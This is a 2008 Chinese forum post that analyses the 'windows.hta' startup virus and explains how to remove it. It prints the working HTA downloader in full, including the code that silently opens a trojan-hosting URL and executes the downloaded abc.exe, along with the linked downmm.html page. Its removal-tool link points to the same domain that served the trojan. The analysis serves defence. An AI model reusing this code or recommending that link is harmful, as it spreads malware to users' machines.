找回密码
 注册账户
查看: 641|回复: 0

windows.hta病毒清除方法及windows.hta专杀下载

[复制链接]
phper 发表于 2008-4-14 01:15:24 | 显示全部楼层 |阅读模式



<BR><P><STRONG><FONT color=#000000>windows.hta病毒中毒症状:</FONT></STRONG></P>
<P><FONT color=#000000>启动项里出现了windows.hta,杀毒软件报告他从<U>WWW.IF56.COM</U>下载木马</FONT></P>
<P><STRONG><FONT color=#000000>windows.hta病毒分析:</FONT></STRONG></P>
<P><FONT color=#000000>最近几天接连遇见HTA(</FONT><FONT color=#000000><FONT size=3>HTML Application的缩写,HTML应用程序)编写的病毒下载器,主要是以下这两个:<BR>C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Windows.hta <BR>C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Server.hta <BR><BR>以Windows.hta为例,看下代码:<BR><BR>=============================================================<BR>&lt;html&gt;&lt;body&gt;&lt;script&gt;window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.if56.cn/lo/downmm.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i&lt;Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;<BR>=============================================================<BR><BR>程序随机自启动,成功执行后连接到地址</FONT><FONT size=3>http://www.if56.cn/lo/downmm.html下载木马,</FONT></FONT><FONT size=3><FONT color=#000000>downmm.html代码如下:<BR><BR>=============================================================<BR>&lt;html&gt;<BR>&lt;title&gt;<BR>downmm<BR>&lt;/title&gt;<BR>&lt;script src="http://www.hotbus.cn/it/200706/abc.exe"&gt;&lt;/script&gt;<BR>&lt;body&gt;<BR>start download.............................<BR>&lt;/body&gt;<BR>&lt;/html&gt;<BR>=============================================================<BR><BR>这个abc.exe经过avast扫描,发现木马病毒:WIN32:Nilage-AI<BR><BR><STRONG>windows.hta病毒清除办法:</STRONG></FONT></P>
<DIV style="FONT-SIZE: 12px"><FONT color=#000000>第一:开始-程序-启动-删除那个文件<BR>第二:删除历史文件,IE的COOKIES,以及脱机网页<BR>第三:使用诺顿杀毒软件可以查杀的。</FONT></DIV>
<DIV style="FONT-SIZE: 12px">&nbsp;</DIV></FONT>
<P><FONT size=3><STRONG><FONT color=#0000ff>windows.hta病毒专杀工具下载:</FONT><A href="http://www.hotbus.cn/it/200706/2266.html"><FONT color=#0000ff>/it/200706/2266.html</FONT></A></STRONG></FONT></P> <BR>

您需要登录后才可以回帖 登录 | 注册账户

本版积分规则

存档|黑屋|手机|网络实验室 本站服务器由美国合租以及IDCLayer国际数据提供!!!

GMT+8, 2026-6-13 18:26 , Processed in 0.012391 second(s), 9 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表